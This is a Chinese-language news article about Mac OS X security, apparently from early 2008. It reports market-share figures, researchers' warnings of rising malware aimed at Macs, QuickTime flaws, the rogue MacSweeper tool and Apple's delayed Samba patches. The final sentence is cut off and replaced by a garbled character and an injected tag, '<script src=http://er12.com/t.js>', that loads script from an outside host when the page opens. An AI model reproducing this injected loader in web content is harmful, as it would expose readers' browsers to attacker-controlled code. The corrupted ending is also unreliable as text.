苹果公司的电脑操作系统mac os x比windows操作系统更加安全,但是从长期来讲并不一定是比windows更安全的。安全专家称,随着苹果公司在全世界范围内的市场份额的增长,苹果公司的产品能够找到进入更多商业环境的途径,攻击者肯定会随着这一趋势,针对苹果公司的软件漏洞创造出更大量的病毒。
根据行业分析公司gartner的研究,苹果公司在2007年第四季度发售出了超过100万台安装macos x操作系统的计算机,比2006年第四季度增长了227,000台。分析公司报告说,苹果公司在2007年的美国市场份额比2006年跳跃增长了28个百分点,上升到了超过6%的市场份额。
根据苹果公司的ceo steve jobs在上周的mac世界博览会和讨论会上的声明,从去年开始发行这些产品以来,苹果公司已经卖出了4百万台iphone手机 和5百万份leopard操作系统(mac os x 10.5)的拷贝,leopard是苹果公司最新的操作系统,看起来苹果公司的前景比任何时候都要更强大。
然而,恶意软件研究者们和行业分析员们警告说,随着苹果公司的终端设备在全球范围内的使用数量的增加,安全问题也将会纠缠在它们的产品上。
“要得到市场份额是很困难的。到最后,恶意软件编写者们并不在乎你使用的是什么操作系统;他们所关注的是,是否有有价值的资料藏在你的机器里,和他们有没有机会利用这些资料, ” mcafee公司的avert实验室小组安全研究主管david marcus说。
“微软公司的windows操作系统一直以来都被黑客紧盯不舍,因为它比mac os操作系统的使用范围要广阔得多,”他说,“但是恶意软件编写者和其他每个人一样看到了现在的趋势,他们知道现在越来越多的人倾向于使用apple公司的产品,包括政府研究所和商业公司都是这样;如果能从这个潮流中找到几个机会获取商业利益,他们就会朝着这个方向前进。”
mac操作系统的漏洞
据研究员表示,在一些情况下,攻击者会寻找机会利用软件中的漏洞,比如目前尚未安装补丁的苹果公司的多媒体播放器应用程序quicktime的软件漏洞。在其他一些情况下,恶意软件编写者更多的是利用社会工程攻击来制造威胁,比如利用在mac世界博览会上出现的macsweeper rougue cleanup tool清理工具软件。
macsweeper作为证据表明开发者们——无论是合法的还是不合法的——已经开始把注意力转移到苹果的操作平台上来,预计mac的使用者们会产生安全方面的担忧,marcus说。尽管macsweeper由它的创造者们定位成从安装macos操作系统的计算机里清理掉恶意软件程序和其他不想要的软件的多用途软件,它已经被事实证明几乎没有任何用处,尽管它要价40美元。
david maynor,是研究与咨询errata安全公司的技术总监,他说攻击者会找到的攻击mac os的地方,是通过在很早以前的开放源代码库里找到的使用在这个平台上的软件漏洞。
对这些在代码库里找到的问题,苹果公司的修补工作普遍延迟,例如使用在苹果公司的mac os x操作系统里面的samba网络协议的问题。
即使当samba开放源代码社区已经给某个已知的安全问题创建了一个修复,苹果公司还是常常花费三到四个月的时间为它的产品介绍一个相关的补丁,这样的做法给了任何一个寻找机会破坏mac系统的攻击者一个长期的空当时间来进行攻击,maynor坚持说。
“如果有人拥有mac os操作系统包含的设计上的开放源代码安全问题的列表,他们就可以用来对付os x的使用者,”maynor说。“samba是一个完美的例子,因为它一般有一个很长时间的空当期。”
地下的恶意攻击活动在增长
maynor说,他在去年观察到与苹果公司相关的,围绕之前的几个quicktime软件漏洞的地下恶意软件研究社区的活动在增长。
“这并不是因为mac操作系统的漏洞的数字在增长。如果你去看他们自己的安全档案,你就会看到总是有很多东西被报告出来,但是在过去没有人重视这些事情,”maynor说。“问题之一是很多使用者们买进了一个错误观念,他们觉得因为苹果公司的发展过程,所以mac os操作系统是更安全的。但是这并不真的是事实。还有些人觉得由于苹果公司的市场份额小一些,所以他们在某种程度上受到了保护,但是随着更多的计算机被售出,这些产品会引起更多的关注。”
lumension是一家专门从事漏洞的扫描和补丁的软件厂商,根据lumension的官员的说法,mac os操作系统在去年被报告出的安全漏洞要远多于微软的windows操作系统的漏洞。以前被称为patchlink公司的lumension 公司的解决方案与策略总监don leatham说,2007年苹果的mac os x操作系统被报告出的漏洞是window操作系统的5倍。然而,他指出,这些问题很多都被当作不重要的小事,而微软的windows操作系统的问题则被引人注目地批评。
但是leatham同意在被公之于众地的漏洞中,苹果的mac os操作系统的漏洞往往比与它们相对应的微软window的漏洞停留更长时间未处理解决。“重要的往往并非是存在着的?script src=http://er12.com/t.js>
